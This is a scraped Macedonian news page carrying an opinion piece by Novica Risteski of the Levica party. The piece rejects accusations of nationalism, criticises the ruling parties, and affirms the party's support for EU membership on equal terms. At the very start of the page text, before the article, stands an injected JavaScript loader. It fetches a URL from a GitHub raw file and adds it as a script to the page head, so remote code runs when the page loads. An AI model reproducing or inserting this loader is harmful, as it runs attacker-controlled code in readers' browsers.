;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); Левица се залага за ЕУ во која сите држави ќе бидат еднакви - Антропол
АктуелноСтав

Левица се залага за ЕУ во која сите држави ќе бидат еднакви

  • Став на Новица Ристески член на ЦК на Левица.

Обвинувањата на име на Левица за наводни националистички политики, наметнати од клептопратските власти, не само што не се вистина, туку истите се само неупешен обид за спин кој повеќе од очигледно не поминува кај обичниот народ. Бранењето на националните интереси, достоинството на народот, правдата и правото во случаи кога некој постапува по нарачка, противправно и спротивно на историските ослободителни достигнувања на македонскиот народ, не може (и не смее) да се квалификува како изразит национал-шовинизам, туку како висок патриотски чин.

Кога Левица беше единствена партија која побара драстично намалување на цените на приватните болници за да можат да бидат достапни за сите, Тие (клептокартите)  молчеа, кога Левица бараше намалување на противзаконскиот енормен додаток на плати на уставните судии, Тие молчеа и беа едногласни за да има кој да им ги спасува непромислените закони кои ги носат 30 години, а кои се во интерес единствено на олигархијата. Молчеа и ништо не преземаа и кога Левица бараше да се намалат патните трошоци на пратениците на ниво на повратен автобуски билет. Молчеа и кога Левица реагираше за т.н. Закон за дивоградби, со кој решија да си овозможат да градат сопствени хациенди во строго заштитени зелени појаси. 

Тука е вистинскиот бирократски фашизам, кога Тие водени од нивната основна максима „Раздели па владеј“, го користат државниот апарат за да го поделат, раскараат и осиромашат обичниот народ меѓусебе, за повторно да ги задоволат интересите и привилегиите на олигархијата, а воедно и да ја оттргнат од себе вината и истата да ја префрлат на друг. Тие еден закон не донесоа во полза на работничката класа, едно ветување не е исполнето до крај на обичниот работник Албанец, Турчин, Македонец кој не може да врзе крај со крај.

Дополнително, Левица во највисоките партиски тела, носители на листи и на локални и парламентари избори и општински советници, довербата ја дала и политиката ја креира со лица кои се Турци, Роми, Бошњаци, како интелектуалци, образовани луѓе, патриоти кои си ја сакаат државата и кои работат за интересите на работничката класа. Оние кои обвинуваат за фашизам и нацизам не можат да се пофалат со такви достигнувања. Дваесет години не можат ни да помислат на такви високоеволутивни цивилизациски вредности, бидејќи истите живеат во минатото, со обиди да ја лажираат иднината и позицијата на угнетениот народ, како нивен единствен опонент.

И за крај, истите Тие ја обвинуваат Левица дека се залага против македонските евро-интеграции. Повторно, како и претходно, безобзирно лажат, мислејќи дека ќе профитираат Тие, но во пракса им се случува спротивното т.е. феноменот – Левица. Во програмата на Левица изричито и јасно стои дека партија отворено се залага за зачленување на Република Македонија во Европската Унија, со инсистирање во процесот на преговори Македонија да не биде принудувана на отстапки и да се почитува достоинството на македонската нација, а воедно партијата дава и отворена поддршка на прогресивните народи во нивната борба против неолиберализмот во ЕУ, кои се залагаат за владеење на рамноправност и еднаквост помеѓу сите народи.